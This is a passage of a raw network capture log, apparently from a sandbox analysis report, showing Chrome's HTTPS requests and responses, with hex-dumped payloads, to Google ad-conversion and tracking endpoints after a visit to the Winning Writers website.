                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:32 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                            Data Ascii: d<html></html>
                                                                                                                                                                                            2024-11-18 20:00:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            137192.168.2.1649873142.250.186.1624436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:31 UTC1479OUTGET /pagead/viewthroughconversion/1072733940/?random=1731960030432&cv=11&fst=1731960030432&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                            Host: googleads.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:32 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:32 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:32 UTC675INData Raw: 31 33 34 64 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                            Data Ascii: 134d(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                            2024-11-18 20:00:32 UTC1378INData Raw: 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 63 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 63 5b 30 5d 2c 67 3b 21 61 26 26 65 20 69 6e 20 74 3f 67 3d 74 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 63 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 63 3d 63 5b 63 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 70 26 26 64 3d 3d 3d 22 65 73 36 22 3f 67 5b 63 5d 3a 6e 75 6c 6c 3b 62 3d 62 28 64 29 3b 62 21 3d 6e 75 6c 6c 26 26 28 61 3f 68 28 74 2c 63 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 3a 62 21 3d 3d 64 26 26 28 76 5b 63 5d 3d 3d 3d 76 6f 69 64 20 30
                                                                                                                                                                                            Data Ascii: r c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0
                                                                                                                                                                                            2024-11-18 20:00:32 UTC1378INData Raw: 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 72 65 74 75 72 6e 20 47 3f 21 21 4f 26 26 4f 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 54 28 29 3f 51 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 52 28 22 43 68 72 6f 6d 65 22 29 7c 7c 52 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c 7c 52 28 22 53 69 6c 6b 22 29 7d 3b 21 52 28 22 41 6e 64 72 6f 69 64 22 29 7c 7c 55 28 29 3b 55 28 29 3b 52 28 22 53 61 66 61 72 69 22 29 26 26 28 55 28 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 43 6f 61 73 74 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 4f 70 65 72 61 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c
                                                                                                                                                                                            Data Ascii: Of(a)!=-1};function T(){return G?!!O&&O.brands.length>0:!1}function U(){return T()?Q("Chromium"):(R("Chrome")||R("CriOS"))&&!(T()?0:R("Edge"))||R("Silk")};!R("Android")||U();U();R("Safari")&&(U()||(T()?0:R("Coast"))||(T()?0:R("Opera"))||(T()?0:R("Edge"))|
                                                                                                                                                                                            2024-11-18 20:00:32 UTC1378INData Raw: 26 26 44 2e 73 65 6e 64 42 65 61 63 6f 6e 28 71 29 7d 63 61 74 63 68 28 62 61 29 7b 41 2e 54 41 47 47 49 4e 47 3d 41 2e 54 41 47 47 49 4e 47 7c 7c 5b 5d 2c 41 2e 54 41 47 47 49 4e 47 5b 31 35 5d 3d 21 30 7d 63 61 7c 7c 46 28 71 29 3b 4a 3d 21 30 7d 7d 4a 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 72 2e 6f 6e 6c 6f 61 64 3d 65 3b 72 2e 73 72 63 3d 64 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 58 3d 5b 22 73 73 5f 22 5d 2c 59 3d 73 7c 7c 7a 3b 58 5b 30 5d 69 6e 20 59 7c 7c 74 79 70 65 6f 66 20 59 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 59 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 58 5b 30 5d 29 3b 20 66 6f 72 28 76 61 72 20 5a 3b 58 2e 6c 65 6e 67 74 68 26 26 28 5a 3d 58 2e 73 68 69 66 74 28 29 29 3b 29 58 2e
                                                                                                                                                                                            Data Ascii: &&D.sendBeacon(q)}catch(ba){A.TAGGING=A.TAGGING||[],A.TAGGING[15]=!0}ca||F(q);J=!0}}J&&e()}}(f)));r.onload=e;r.src=d[f.g]}e()}var X=["ss_"],Y=s||z;X[0]in Y||typeof Y.execScript=="undefined"||Y.execScript("var "+X[0]); for(var Z;X.length&&(Z=X.shift());)X.
                                                                                                                                                                                            2024-11-18 20:00:32 UTC140INData Raw: 64 31 5c 78 32 36 63 69 64 5c 78 33 64 43 41 51 53 4b 51 43 61 37 4c 37 64 59 7a 47 78 66 74 50 6d 42 47 41 39 78 42 56 74 33 72 71 48 4e 69 37 69 52 63 6e 4c 50 5a 65 68 55 6b 58 33 36 6c 52 6e 5a 6d 68 74 73 36 63 71 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 32 33 35 37 35 33 31 34 30 37 5c 78 32 36 72 6d 74 5f 74 6c 64 5c 78 33 64 30 5c 78 32 36 69 70 72 5c 78 33 64 79 27 5d 2c 20 5b 5d 29 3b 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                            Data Ascii: d1\x26cid\x3dCAQSKQCa7L7dYzGxftPmBGA9xBVt3rqHNi7iRcnLPZehUkX36lRnZmhts6cq\x26random\x3d2357531407\x26rmt_tld\x3d0\x26ipr\x3dy'], []);})();
                                                                                                                                                                                            2024-11-18 20:00:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            138192.168.2.1649877142.250.185.1944436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:33 UTC1301OUTGET /pagead/viewthroughconversion/1072733940/?random=1731960030432&cv=11&fst=1731960030432&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                            Host: googleads.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:33 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:33 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:33 UTC675INData Raw: 31 33 34 63 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                            Data Ascii: 134c(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                            2024-11-18 20:00:33 UTC1378INData Raw: 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 63 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 63 5b 30 5d 2c 67 3b 21 61 26 26 65 20 69 6e 20 74 3f 67 3d 74 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 63 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 63 3d 63 5b 63 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 70 26 26 64 3d 3d 3d 22 65 73 36 22 3f 67 5b 63 5d 3a 6e 75 6c 6c 3b 62 3d 62 28 64 29 3b 62 21 3d 6e 75 6c 6c 26 26 28 61 3f 68 28 74 2c 63 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 3a 62 21 3d 3d 64 26 26 28 76 5b 63 5d 3d 3d 3d 76 6f 69 64 20 30
                                                                                                                                                                                            Data Ascii: r c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0
                                                                                                                                                                                            2024-11-18 20:00:33 UTC1378INData Raw: 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 72 65 74 75 72 6e 20 47 3f 21 21 4f 26 26 4f 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 54 28 29 3f 51 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 52 28 22 43 68 72 6f 6d 65 22 29 7c 7c 52 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c 7c 52 28 22 53 69 6c 6b 22 29 7d 3b 21 52 28 22 41 6e 64 72 6f 69 64 22 29 7c 7c 55 28 29 3b 55 28 29 3b 52 28 22 53 61 66 61 72 69 22 29 26 26 28 55 28 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 43 6f 61 73 74 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 4f 70 65 72 61 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c
                                                                                                                                                                                            Data Ascii: Of(a)!=-1};function T(){return G?!!O&&O.brands.length>0:!1}function U(){return T()?Q("Chromium"):(R("Chrome")||R("CriOS"))&&!(T()?0:R("Edge"))||R("Silk")};!R("Android")||U();U();R("Safari")&&(U()||(T()?0:R("Coast"))||(T()?0:R("Opera"))||(T()?0:R("Edge"))|
                                                                                                                                                                                            2024-11-18 20:00:33 UTC1378INData Raw: 26 26 44 2e 73 65 6e 64 42 65 61 63 6f 6e 28 71 29 7d 63 61 74 63 68 28 62 61 29 7b 41 2e 54 41 47 47 49 4e 47 3d 41 2e 54 41 47 47 49 4e 47 7c 7c 5b 5d 2c 41 2e 54 41 47 47 49 4e 47 5b 31 35 5d 3d 21 30 7d 63 61 7c 7c 46 28 71 29 3b 4a 3d 21 30 7d 7d 4a 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 72 2e 6f 6e 6c 6f 61 64 3d 65 3b 72 2e 73 72 63 3d 64 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 58 3d 5b 22 73 73 5f 22 5d 2c 59 3d 73 7c 7c 7a 3b 58 5b 30 5d 69 6e 20 59 7c 7c 74 79 70 65 6f 66 20 59 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 59 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 58 5b 30 5d 29 3b 20 66 6f 72 28 76 61 72 20 5a 3b 58 2e 6c 65 6e 67 74 68 26 26 28 5a 3d 58 2e 73 68 69 66 74 28 29 29 3b 29 58 2e
                                                                                                                                                                                            Data Ascii: &&D.sendBeacon(q)}catch(ba){A.TAGGING=A.TAGGING||[],A.TAGGING[15]=!0}ca||F(q);J=!0}}J&&e()}}(f)));r.onload=e;r.src=d[f.g]}e()}var X=["ss_"],Y=s||z;X[0]in Y||typeof Y.execScript=="undefined"||Y.execScript("var "+X[0]); for(var Z;X.length&&(Z=X.shift());)X.
                                                                                                                                                                                            2024-11-18 20:00:33 UTC139INData Raw: 64 31 5c 78 32 36 63 69 64 5c 78 33 64 43 41 51 53 4b 51 43 61 37 4c 37 64 5f 34 6b 58 65 31 2d 45 79 2d 49 78 51 5a 42 68 58 6b 74 4c 4c 57 48 69 68 6a 65 46 41 65 78 54 54 5a 56 4a 45 63 4d 52 35 30 5f 7a 70 46 6e 5f 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 38 30 32 31 30 38 35 32 35 5c 78 32 36 72 6d 74 5f 74 6c 64 5c 78 33 64 30 5c 78 32 36 69 70 72 5c 78 33 64 79 27 5d 2c 20 5b 5d 29 3b 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                            Data Ascii: d1\x26cid\x3dCAQSKQCa7L7d_4kXe1-Ey-IxQZBhXktLLWHihjeFAexTTZVJEcMR50_zpFn_\x26random\x3d802108525\x26rmt_tld\x3d0\x26ipr\x3dy'], []);})();
                                                                                                                                                                                            2024-11-18 20:00:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            139192.168.2.1649876142.250.185.1644436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:33 UTC1547OUTGET /pagead/1p-user-list/1072733940/?random=1731960030432&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dYzGxftPmBGA9xBVt3rqHNi7iRcnLPZehUkX36lRnZmhts6cq&random=2357531407&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:33 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:33 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                                                            Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-11-18 20:00:33 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,D;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            140192.168.2.1649878142.250.186.1324436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:34 UTC1309OUTGET /pagead/1p-user-list/1072733940/?random=1731960030432&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dYzGxftPmBGA9xBVt3rqHNi7iRcnLPZehUkX36lRnZmhts6cq&random=2357531407&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:34 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:34 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                                                            Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                            X-XSS-Protection: 0
